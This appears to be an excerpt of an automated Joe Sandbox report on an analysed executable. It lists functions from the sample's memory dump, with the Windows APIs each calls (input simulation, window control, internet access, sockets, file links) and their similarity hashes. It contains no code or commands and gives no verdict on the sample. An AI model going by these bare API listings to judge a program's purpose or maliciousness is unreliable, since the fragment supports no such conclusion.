                                                                                                                • Instruction Fuzzy Hash: C2B180756043018FC714DF28C48096ABBE5EF8A754F18896EF889DB352DB31ED45CBA2
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00D9AF56
                                                                                                                • CoUninitialize.OLE32 ref: 00D9AF61
                                                                                                                  • Part of subcall function 00D81050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D810B8
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D9AF6C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D9B23F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: 541fba01f3ae49e4a0a23f57d65a9f49c3efa154d668946a8f162c1a664d8416
                                                                                                                • Instruction ID: c507e4625f4afff96e95bf673ac9e8bdec687758fa8463ac5bf5aab31adb337f
                                                                                                                • Opcode Fuzzy Hash: 541fba01f3ae49e4a0a23f57d65a9f49c3efa154d668946a8f162c1a664d8416
                                                                                                                • Instruction Fuzzy Hash: 72A125356047019FCB10DF14C991B2AB7E5FF89360F058459F99AAB3A1DB30ED44CBA6
                                                                                                                APIs
                                                                                                                • _memmove.LIBCMT ref: 00D4C419
                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00D86653,?,?,00000000), ref: 00D4C495
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1325644223-0
                                                                                                                • Opcode ID: 33e03760b97f91a24a0974aadedc927b1a322caf76254592d23d6315a9de88f2
                                                                                                                • Instruction ID: f154adbbd480c68fcdfbe5c568d218d457dba4191467651c7707de3c46054891
                                                                                                                • Opcode Fuzzy Hash: 33e03760b97f91a24a0974aadedc927b1a322caf76254592d23d6315a9de88f2
                                                                                                                • Instruction Fuzzy Hash: 12A1AD70A04605EBDF40CF59C984BA9FBB0FF05300F18C195E8A9DA296D735E960CBB1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2808897238-0
                                                                                                                • Opcode ID: 207bd3489ccb9cab2dd6360ed7978aace5c7df2ee23fc256ce8077a15b6d0d45
                                                                                                                • Instruction ID: ee225222ca782d3e66571e081eb83f13522808fe801fbc8aca8ba63b9c94fe5b
                                                                                                                • Opcode Fuzzy Hash: 207bd3489ccb9cab2dd6360ed7978aace5c7df2ee23fc256ce8077a15b6d0d45
                                                                                                                • Instruction Fuzzy Hash: CA5176316403029BEB249F6DD89562DB3A5EF85310F64D81FE98EDB2A1FA70DC408732
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3877424927-0
                                                                                                                • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction ID: 9e3771f5737e3cc1294a5173aaa968c70f57cb766b0767c1448ecf850b9b0896
                                                                                                                • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction Fuzzy Hash: CA51A030A00705DBDB249FA988816AE7BA5EF41320F288729F875972D0DBB1ED519B70
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00DAC354
                                                                                                                • ScreenToClient.USER32(?,00000002), ref: 00DAC384
                                                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DAC3EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: ff43de6ef4503275d9671065c33ffd767e94f13bfb3da27bdf211fa944d9079d
                                                                                                                • Instruction ID: a52f40361d54178aac70459be8b613200f4a34e16b101940ea5118ce348132f1
                                                                                                                • Opcode Fuzzy Hash: ff43de6ef4503275d9671065c33ffd767e94f13bfb3da27bdf211fa944d9079d
                                                                                                                • Instruction Fuzzy Hash: CE517E31910209EFCF10DF68C980AAE7BB6FB4A320F149559F8159B290D770ED81CBA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D7D258
                                                                                                                • __itow.LIBCMT ref: 00D7D292
                                                                                                                  • Part of subcall function 00D7D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D7D549
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D7D2FB
                                                                                                                • __itow.LIBCMT ref: 00D7D350
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 9c9af4c83c7a78e6c303afa835bcb8d984a35975e9adaf3901890097fb3f4229
                                                                                                                • Instruction ID: 82ab3a41e646212fd8d3b19ab0a177e90517fb4fd8d167b0bf4844a3feafad14
                                                                                                                • Opcode Fuzzy Hash: 9c9af4c83c7a78e6c303afa835bcb8d984a35975e9adaf3901890097fb3f4229
                                                                                                                • Instruction Fuzzy Hash: 2241A271A00609AFDF15DF54C842FEE7BBAEF49700F044019FA09A3292EB759A45CB76
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D8EF32
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00D8EF58
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D8EF7D
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D8EFA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: c4f2f4eb00656702f1a402e367bec7fdd564b9c5cc6628ec4fde07afc229ec4a
                                                                                                                • Instruction ID: 7257912685f5676fc13f5a2874cadb8331087630f8a136204056a7487063c40d
                                                                                                                • Opcode Fuzzy Hash: c4f2f4eb00656702f1a402e367bec7fdd564b9c5cc6628ec4fde07afc229ec4a
                                                                                                                • Instruction Fuzzy Hash: 3F411739600611DFCB11EF15C944A5DBBE6EF89360B198098ED4AAF362DB30FD40DBA1
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DAB3E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: 1bab5727df4b38f7f92537553022b381c1c28b68776cfda8428ca4c8569c0b63
                                                                                                                • Instruction ID: e1fc5fd57482ff1098bde23ecb9f8581d278d47e6f7c68f4b0ede53c80f32285
                                                                                                                • Opcode Fuzzy Hash: 1bab5727df4b38f7f92537553022b381c1c28b68776cfda8428ca4c8569c0b63
                                                                                                                • Instruction Fuzzy Hash: 2231A334600205EFEF249B58CC95FA83765EB0B374F188513FA91D62A3C7B5D9829B71
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00DAD617
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00DAD68D
                                                                                                                • PtInRect.USER32(?,?,00DAEB2C), ref: 00DAD69D
                                                                                                                • MessageBeep.USER32(00000000), ref: 00DAD70E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: 99af4c92d755eb9253496da9bca7dee847751121db40cc47262f860e47086a3d
                                                                                                                • Instruction ID: 567cb39c1b4ed471a3e3ba8757169e0d90a49b518d37385d7c29e88f0048171e
                                                                                                                • Opcode Fuzzy Hash: 99af4c92d755eb9253496da9bca7dee847751121db40cc47262f860e47086a3d
                                                                                                                • Instruction Fuzzy Hash: 51416A31A00219DFCB15CF59D880BA97BF6BB4A300F1881AAE45A9F651D731E945CB60
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00D844EE
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D8450A
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00D8456A
                                                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00D845C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 357d8df5e9022b9bae70048f590935e7f0a857f48c8367db2580163c38863f8c
                                                                                                                • Instruction ID: b1e30d410fe6c3b0e5ef3deefc7033ee33450bbb390fac288c9d8cf1411da29e
                                                                                                                • Opcode Fuzzy Hash: 357d8df5e9022b9bae70048f590935e7f0a857f48c8367db2580163c38863f8c
                                                                                                                • Instruction Fuzzy Hash: D331E7B190425A6FEF34AB649808BFE7BB59B46714F0801AAF4C5922C1C774DA44D771
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D74DE8
                                                                                                                • __isleadbyte_l.LIBCMT ref: 00D74E16
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00D74E44
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00D74E7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 90f7f123bfe63a15d0c360d419b5c13cb09b3ae72d5020dae9d2c73e46e79c71
                                                                                                                • Instruction ID: 6bb5880d9803533787805209fcbee8354b4801578c85044dd767400d21442894
                                                                                                                • Opcode Fuzzy Hash: 90f7f123bfe63a15d0c360d419b5c13cb09b3ae72d5020dae9d2c73e46e79c71
                                                                                                                • Instruction Fuzzy Hash: D6316E31600256AFDF229E75CC45BBA7BAAFF41320F198529F869871A0F730D851DBB1
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00DA7AB6
                                                                                                                  • Part of subcall function 00D869C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D869E3
                                                                                                                  • Part of subcall function 00D869C9: GetCurrentThreadId.KERNEL32 ref: 00D869EA
                                                                                                                  • Part of subcall function 00D869C9: AttachThreadInput.USER32(00000000,?,00D88127), ref: 00D869F1
                                                                                                                • GetCaretPos.USER32(?), ref: 00DA7AC7
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00DA7B00
                                                                                                                • GetForegroundWindow.USER32 ref: 00DA7B06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: 9d89d71dc34f40b5f6ea42abdb169c2b441fd8e6c37cfb8b4aa9d16ac0f1e674
                                                                                                                • Instruction ID: d92adc7fa90bd2ff07c031ba37a5e1b316734b4d7a6a784578bb33f7941e6f31
                                                                                                                • Opcode Fuzzy Hash: 9d89d71dc34f40b5f6ea42abdb169c2b441fd8e6c37cfb8b4aa9d16ac0f1e674
                                                                                                                • Instruction Fuzzy Hash: 04310371D00109AFDB00EFB5DC859EFBBF9EF55314B10806AE816E7251EA359E098BB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • GetCursorPos.USER32(?), ref: 00DAEFE2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DBF3C3,?,?,?,?,?), ref: 00DAEFF7
                                                                                                                • GetCursorPos.USER32(?), ref: 00DAF041
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DBF3C3,?,?,?), ref: 00DAF077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: f5ec4385a999764de10626f62d9786ac026d4ab4ddfd7eef8edaee7a2fd932a5
                                                                                                                • Instruction ID: 59423673254634cd8150317212ca28234092ee4a2df20733bdde31e338c098ab
                                                                                                                • Opcode Fuzzy Hash: f5ec4385a999764de10626f62d9786ac026d4ab4ddfd7eef8edaee7a2fd932a5
                                                                                                                • Instruction Fuzzy Hash: C621B135500118AFCB258F95CC99EEA7BB5EF4A750F0840A9F9059B2A2C3719D51DBB0
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D949B7
                                                                                                                  • Part of subcall function 00D94A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D94A60
                                                                                                                  • Part of subcall function 00D94A41: InternetCloseHandle.WININET(00000000), ref: 00D94AFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: 398c0a8dbc33f79f757f96b395b4c65c39188613f1c2de029c2af11e84efbf7f
                                                                                                                • Instruction ID: 446dc9dac0985a6c175b91eabc633d9f4ef57f570e00b64b40449ffc1e5448a6
                                                                                                                • Opcode Fuzzy Hash: 398c0a8dbc33f79f757f96b395b4c65c39188613f1c2de029c2af11e84efbf7f
                                                                                                                • Instruction Fuzzy Hash: CD21F231240702BBDF129F608C00FBBB7AAFB48705F14411EFA4696251EB31D812ABB4
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00DA88A3
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA88BD
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA88CB
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DA88D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: d9144055c5897280c4dbfa70948c0be4ea7f4868a71afb5350cab86f810e06df
                                                                                                                • Instruction ID: 0b7ee8b1f1ad467541b0aba794fc0d2a32b9ac386a827d5443bfb7c1992a51fa
                                                                                                                • Opcode Fuzzy Hash: d9144055c5897280c4dbfa70948c0be4ea7f4868a71afb5350cab86f810e06df
                                                                                                                • Instruction Fuzzy Hash: 6C118131745115AFDB14AB28DC05FAA7BAAEF86321F144119F916C72E1DF74AC00DBB0
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00D9906D
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00D9907F
                                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00D9908C
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D990A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
